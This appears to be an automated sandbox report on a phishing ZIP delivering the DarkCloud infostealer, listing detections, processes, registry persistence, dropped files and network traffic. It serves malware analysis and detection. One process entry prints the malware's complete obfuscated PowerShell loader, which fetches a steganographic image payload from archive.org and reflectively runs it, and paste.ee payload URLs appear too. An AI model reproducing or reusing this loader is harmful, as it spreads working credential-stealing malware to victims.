| File name: | attachments.zip |
| Full analysis: | https://app.any.run/tasks/7755d554-c968-48eb-9367-9e0bf04abfe2 |
| Verdict: | Malicious activity |
| Threats: | DarkCloud is an infostealer that focuses on collecting and exfiltrating browser data from the infected device. The malware is also capable of keylogging and crypto address swapping. DarkCloud is typically delivered to victims’ computers via phishing emails. |
| Analysis date: | July 07, 2025, 08:25:57 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/zip |
| File info: | Zip archive data, at least v2.0 to extract, compression method=deflate |
| MD5: | AE078039E5F66DFD0F049C59D54FA439 |
| SHA1: | 10646AD8239F714B7A6678B3574824FDB3538CE4 |
| SHA256: | FCFE38D191C58B1A1C5C920B354F31B8DD5304217684651B987950FB286819C9 |
| SSDEEP: | 24:98HIpLZvHgnBBEF8g+zXuhSOz/RgYPbMyQQU7sT22:9OIxpHIB6dQcz/RgYoXQGsa2 |
MALICIOUS
Generic archive extractor
- WinRAR.exe (PID: 3780)
Opens an HTTP connection (SCRIPT)
- wscript.exe (PID: 424)
Creates internet connection object (SCRIPT)
- wscript.exe (PID: 424)
Sends HTTP request (SCRIPT)
- wscript.exe (PID: 424)
Changes powershell execution policy (Bypass)
- wscript.exe (PID: 424)
Run PowerShell with an invisible window
- powershell.exe (PID: 640)
Bypass execution policy to execute commands
- powershell.exe (PID: 640)
Downloads the requested resource (POWERSHELL)
- powershell.exe (PID: 640)
Dynamically loads an assembly (POWERSHELL)
- powershell.exe (PID: 640)
DARKCLOUD has been detected (YARA)
- MSBuild.exe (PID: 6256)
SUSPICIOUS
Adds, changes, or deletes HTTP request header (SCRIPT)
- wscript.exe (PID: 424)
Potential Corporate Privacy Violation
- wscript.exe (PID: 424)
- powershell.exe (PID: 640)
The process bypasses the loading of PowerShell profile settings
- wscript.exe (PID: 424)
Base64-obfuscated command line is found
- wscript.exe (PID: 424)
Runs shell command (SCRIPT)
- wscript.exe (PID: 424)
Possibly malicious use of IEX has been detected
- wscript.exe (PID: 424)
Starts POWERSHELL.EXE for commands execution
- wscript.exe (PID: 424)
Uses base64 encoding (POWERSHELL)
- powershell.exe (PID: 640)
Writes data to a memory stream (POWERSHELL)
- powershell.exe (PID: 640)
Starts CMD.EXE for commands execution
- powershell.exe (PID: 640)
- WinRAR.exe (PID: 4168)
Reads security settings of Internet Explorer
- WinRAR.exe (PID: 3780)
- WinRAR.exe (PID: 4168)
There is functionality for taking screenshot (YARA)
- MSBuild.exe (PID: 6256)
Application launched itself
- WinRAR.exe (PID: 3780)
Converts a specified value to an integer (POWERSHELL)
- powershell.exe (PID: 640)
Likely accesses (executes) a file from the Public directory
- cmd.exe (PID: 5928)
Executing commands from a ".bat" file
- WinRAR.exe (PID: 4168)
INFO
Manual execution by a user
- wscript.exe (PID: 424)
Disables trace logs
- powershell.exe (PID: 640)
Checks proxy server information
- powershell.exe (PID: 640)
- slui.exe (PID: 3736)
Uses string replace method (POWERSHELL)
- powershell.exe (PID: 640)
Found Base64 encoded text manipulation via PowerShell (YARA)
- powershell.exe (PID: 640)
Found Base64 encoded reflection usage via PowerShell (YARA)
- powershell.exe (PID: 640)
Found Base64 encoded access to BitConverter class via PowerShell (YARA)
- powershell.exe (PID: 640)
Found Base64 encoded spyware-related PowerShell classes (YARA)
- powershell.exe (PID: 640)
UPX packer has been detected
- MSBuild.exe (PID: 6256)
Checks supported languages
- MSBuild.exe (PID: 6256)
- MpCmdRun.exe (PID: 1028)
Gets data length (POWERSHELL)
- powershell.exe (PID: 640)
Reads the computer name
- MpCmdRun.exe (PID: 1028)
Create files in a temporary directory
- MpCmdRun.exe (PID: 1028)
Reads the software policy settings
- slui.exe (PID: 3736)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .zip | | | ZIP compressed archive (100) |
|---|
EXIF
ZIP
| ZipRequiredVersion: | 20 |
|---|---|
| ZipBitFlag: | 0x0002 |
| ZipCompression: | Deflated |
| ZipModifyDate: | 2025:07:07 02:03:08 |
| ZipCRC: | 0xa2900767 |
| ZipCompressedSize: | 732 |
| ZipUncompressedSize: | 763 |
| ZipFileName: | jpy3,800,000 Debit copy.PDF.z |
Total processes
143
Monitored processes
12
Malicious processes
3
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 424 | "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\Desktop\jpy3,800,000 Debit copy.VBS" | C:\Windows\System32\wscript.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 640 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noprofile -ep bypass -c "$fluttersome='JGRlZmlsYWRlcyA9ICdWa0ZKJzskc3RlYXJhdGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGVmaWxhZGVzKTskbWlsZXN0b25lID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJHN0ZWFyYXRlcyk7JHJ1YmVjdWxhID0gJ1EyeGhjM05NYVdKeVlYSjVNUzVJYjIxbCc7JFVzb25pYW5pc20gPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tYmFzZTY0U3RyaW5nKCRydWJlY3VsYSk7JHRoZWFsb2dpZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkVXNvbmlhbmlzbSk7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uRHJhd2luZzskZW5kcGllY2VzPSdodHRwczovL2FyY2hpdmUub3JnL2Rvd25sb2FkL3VuaXZlcnNlLTE3MzMzNTkzMTUyMDItODc1MC91bml2ZXJzZS0xNzMzMzU5MzE1MjAyLTg3NTAuanBnJzskYmFsZHVjdHVtPU5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGJhbGR1Y3R1bS5IZWFkZXJzLkFkZCgnVXNlci1BZ2VudCcsJ01vemlsbGEvNS4wJyk7JG1vbmdvb3M9JGJhbGR1Y3R1bS5Eb3dubG9hZERhdGEoJGVuZHBpZWNlcyk7JGhhcnBzaWNvbD1bYnl0ZVtdXSgweDQyLCAweDRELCAweDcyLCAweDZFLCAweDM3LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDM2LCAweDAwLCAweDAwLCAweDAwLCAweDI4LCAweDAwLCAweDAwLCAweDAwLCAweDY0LCAweDAwLCAweDAwLCAweDAwLCAweDRELCAweDJGLCAweDAwLCAweDAwLCAweDAxLCAweDAwLCAweDE4LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDNDLCAweDZFLCAweDM3LCAweDAwLCAweEM0LCAweDBFLCAweDAwLCAweDAwLCAweEM0LCAweDBFLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwKTskYmxhbmRmb3JkaWE9LTE7Zm9yKCR6ZXVjdG9jxZNsb21hdGljPTA7JHpldWN0b2PFk2xvbWF0aWMgLWxlICRtb25nb29zLkxlbmd0aC0kaGFycHNpY29sLkxlbmd0aDskemV1Y3RvY8WTbG9tYXRpYysrKXsgJGFicmFkZXI9JHRydWU7Zm9yKCRjb25pb3NwZXJtb3VzPTA7JGNvbmlvc3Blcm1vdXMgLWx0ICRoYXJwc2ljb2wuTGVuZ3RoOyRjb25pb3NwZXJtb3VzKyspe2lmKCRtb25nb29zWyR6ZXVjdG9jxZNsb21hdGljKyRjb25pb3NwZXJtb3VzXSAtbmUgJGhhcnBzaWNvbFskY29uaW9zcGVybW91c10peyRhYnJhZGVyPSRyZWFic29yYmluZzticmVha319aWYoJGFicmFkZXIpeyRibGFuZGZvcmRpYT0kemV1Y3RvY8WTbG9tYXRpYzticmVha319aWYoJGJsYW5kZm9yZGlhIC1lcSAtMSl7cmV0dXJufTskcGlsb3Rpbmc9JG1vbmdvb3NbJGJsYW5kZm9yZGlhLi4oJG1vbmdvb3MuTGVuZ3RoLTEpXTskY29uZHVjdGVkPU5ldy1PYmplY3QgSU8uTWVtb3J5U3RyZWFtOyRjb25kdWN0ZWQuV3JpdGUoJHBpbG90aW5nLDAsJHBpbG90aW5nLkxlbmd0aCk7JGNvbmR1Y3RlZC5TZWVrKDAsJ0JlZ2luJyl8T3V0LU51bGw7JGVwb3h5bGlnbmFucz1bRHJhd2luZy5CaXRtYXBdOjpGcm9tU3RyZWFtKCRjb25kdWN0ZWQpOyRmcmFlbnVsdW09TmV3LU9iamVjdCBDb2xsZWN0aW9ucy5HZW5lcmljLkxpc3RbQnl0ZV07Zm9yKCR0YW5vYWtzPTA7JHRhbm9ha3MgLWx0ICRlcG94eWxpZ25hbnMuSGVpZ2h0OyR0YW5vYWtzKyspe2ZvcigkcGhlbnlscHJvcGFub2lkPTA7JHBoZW55bHByb3Bhbm9pZCAtbHQgJGVwb3h5bGlnbmFucy5XaWR0aDskcGhlbnlscHJvcGFub2lkKyspeyRhc3BpZG9icmFuY2hpYT0kZXBveHlsaWduYW5zLkdldFBpeGVsKCRwaGVueWxwcm9wYW5vaWQsJHRhbm9ha3MpOyRmcmFlbnVsdW0uQWRkKCRhc3BpZG9icmFuY2hpYS5SKTskZnJhZW51bHVtLkFkZCgkYXNwaWRvYnJhbmNoaWEuRyk7JGZyYWVudWx1bS5BZGQoJGFzcGlkb2JyYW5jaGlhLkIpfX07JGZsb3RpbGxhcz1bQml0Q29udmVydGVyXTo6VG9JbnQzMigkZnJhZW51bHVtLkdldFJhbmdlKDAsNCkuVG9BcnJheSgpLDApOyRsb25nbGluZXM9JGZyYWVudWx1bS5HZXRSYW5nZSg0LCRmbG90aWxsYXMpLlRvQXJyYXkoKTskc3BlZWNoPVtDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoJGxvbmdsaW5lcykuUmVwbGFjZSgnQScsJ0AnKS5SZXBsYWNlKCdAJywnQScpOyRPcmFjdWxhcj0nPT1BTXY0R00waFVUNWdsVnZRMkxsVm1MbFIzY2hCM0x2b0RjMFJIYScuUmVwbGFjZSgnfF0nLCd0Jyk7JHRyaWFkcz1bQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHNwZWVjaCk7JHFhYmFsYWg9W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCR0cmlhZHMpOyRwYXN0ZWxpa2U9QCgkT3JhY3VsYXIsJzEnLCdDOlxVc2Vyc1xQdWJsaWNcRG93bmxvYWRzJywnb3JjdWxpZm9ybScsJ01TQnVpbGQnLCcnLCcnLCcnLCcnLCcnLCcnLCd2YnMnLCcnLCcnLCcnLCcyJywnJyk7JHFhYmFsYWguR2V0VHlwZSgkdGhlYWxvZ2llcykuR2V0TWV0aG9kKCRtaWxlc3RvbmUpLkludm9rZSgkZ25vbWEsJHBhc3RlbGlrZSk7JGVwb3h5bGlnbmFucy5EaXNwb3NlKCk7JGNvbmR1Y3RlZC5EaXNwb3NlKCk=';$skylike=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($fluttersome));Invoke-Expression $skylike" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 1028 | "C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -File "C:\Users\admin\AppData\Local\Temp\Rar$VR4168.20095" | C:\Program Files\Windows Defender\MpCmdRun.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Malware Protection Command Line Utility Exit code: 2 Version: 4.18.1909.6 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2532 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3480 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3736 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3780 | "C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\Desktop\attachments.zip | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe | |||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.91.0 Modules
| |||||||||||||||
| 4168 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIa3780.12851\jpy3,800,000 Debit copy.PDF.z" | C:\Program Files\WinRAR\WinRAR.exe | — | WinRAR.exe | |||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.91.0 Modules
| |||||||||||||||
| 4236 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5928 | "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\Users\Public\Downloads\orculiform.vbs" | C:\Windows\System32\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
16 031
Read events
16 012
Write events
19
Delete events
0
Modification events
| (PID) Process: | (3780) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 3 |
Value: C:\Users\admin\Desktop\preferences.zip | |||
| (PID) Process: | (3780) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 2 |
Value: C:\Users\admin\Desktop\chromium_ext.zip | |||
| (PID) Process: | (3780) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 1 |
Value: C:\Users\admin\Desktop\omni_23_10_2024_.zip | |||
| (PID) Process: | (3780) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\Desktop\attachments.zip | |||
| (PID) Process: | (3780) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (3780) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (3780) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
| (PID) Process: | (3780) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | mtime |
Value: 100 | |||
| (PID) Process: | (640) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
| Operation: | write | Name: | Path |
Value: C:\Users\Public\Downloads\orculiform.vbs | |||
| (PID) Process: | (4168) WinRAR.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory |
| Operation: | write | Name: | 2 |
Value: C:\Users\admin\Desktop\omni_23_10_2024_.zip | |||
Executable files
0
Suspicious files
2
Text files
6
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 640 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3qu2ejz5.oyc.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 640 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_y5syt4re.4kv.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 3780 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa3780.12851\jpy3,800,000 Debit copy.PDF.z | compressed | |
MD5:219FC68C9D0D6BE5D71DF755F02B9F5E | SHA256:8CDC647B93F81DC1135FF156BDF49D5E8CD5D594DCFEEA5A9BEAEEF5B4826657 | |||
| 5928 | cmd.exe | C:\Users\Public\Downloads\orculiform.vbs | text | |
MD5:42320E659E8E1885EB96342E52E4EC60 | SHA256:5FE439B587F246640A61C65F77380EA1EC486EC799C676B10102C2A502EADFA9 | |||
| 4168 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$VR4168.20095\jpy3,800,000 Debit copy.PDF.z\jpy3,800,000 Debit copy.VBS | text | |
MD5:4624BE73455AAF8E8C0B8AED279DB3A1 | SHA256:BB545D84903C7D2218979820E63C4FFCDF2F482C9B45CCAA87DCC91B029819FC | |||
| 640 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:CE890670290EB8D044B651252F97A58C | SHA256:17D97584750607CB76068C9EAF8A078B3B55F6CC5AA6C668DA291C913CA77056 | |||
| 4168 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$VR4168.20095\Rar$Scan72422.bat | text | |
MD5:04F41770397915859472C0A761AD9130 | SHA256:5F1D2007D29358B9F74BD8FB287974BF366806C3A5E80FB8CBC58D754F18DA10 | |||
| 1028 | MpCmdRun.exe | C:\Users\admin\AppData\Local\Temp\MpCmdRun.log | text | |
MD5:B1D7E90B08A5DDF9A0AB849750FBE416 | SHA256:CCAC71B18A91673CB0C6C996634E589FEDC6D2C5B6921C6B6593C40277E76B74 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
26
DNS requests
9
Threats
6
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
1268 | svchost.exe | GET | 200 | 2.16.168.114:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
5944 | MoUsoCoreWorker.exe | GET | 200 | 2.16.168.114:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
1268 | svchost.exe | GET | 200 | 2.23.181.156:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
3924 | RUXIMICS.exe | GET | 200 | 2.23.181.156:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
424 | wscript.exe | GET | 301 | 23.186.113.60:80 | http://paste.ee/d/uRGsjOgx/0 | unknown | — | — | shared |
5944 | MoUsoCoreWorker.exe | GET | 200 | 2.23.181.156:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 207.241.224.2:443 | https://archive.org/download/universe-1733359315202-8750/universe-1733359315202-8750.jpg | unknown | image | 5.85 Mb | whitelisted |
— | — | GET | 200 | 23.186.113.60:443 | https://paste.ee/d/uRGsjOgx/0 | unknown | text | 151 Kb | shared |
— | — | GET | 200 | 23.186.113.60:443 | https://paste.ee/d/VX9MHt0n/0 | unknown | text | 1.08 Mb | shared |
640 | powershell.exe | GET | 301 | 23.186.113.60:80 | http://paste.ee/d/VX9MHt0n/0 | unknown | — | — | shared |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
1268 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
5944 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
3924 | RUXIMICS.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1268 | svchost.exe | 2.16.168.114:80 | crl.microsoft.com | Akamai International B.V. | RU | whitelisted |
5944 | MoUsoCoreWorker.exe | 2.16.168.114:80 | crl.microsoft.com | Akamai International B.V. | RU | whitelisted |
1268 | svchost.exe | 2.23.181.156:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
3924 | RUXIMICS.exe | 2.23.181.156:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
5944 | MoUsoCoreWorker.exe | 2.23.181.156:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
paste.ee |
| shared |
archive.org |
| whitelisted |
activation-v2.sls.microsoft.com |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
2200 | svchost.exe | Misc activity | ET INFO Pastebin-like Service Domain in DNS Lookup (paste .ee) |
424 | wscript.exe | Potential Corporate Privacy Violation | ET INFO Pastebin-style Service (paste .ee) in TLS SNI |
— | — | Unknown Traffic | ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW) |
— | — | Misc activity | INFO [ANY.RUN] USER_AGENTS Suspicious User-Agent (Mozilla/5.0) |
— | — | Misc activity | INFO [ANY.RUN] USER_AGENTS Suspicious User-Agent (Mozilla/5.0) |
640 | powershell.exe | Potential Corporate Privacy Violation | ET INFO Pastebin-style Service (paste .ee) in TLS SNI |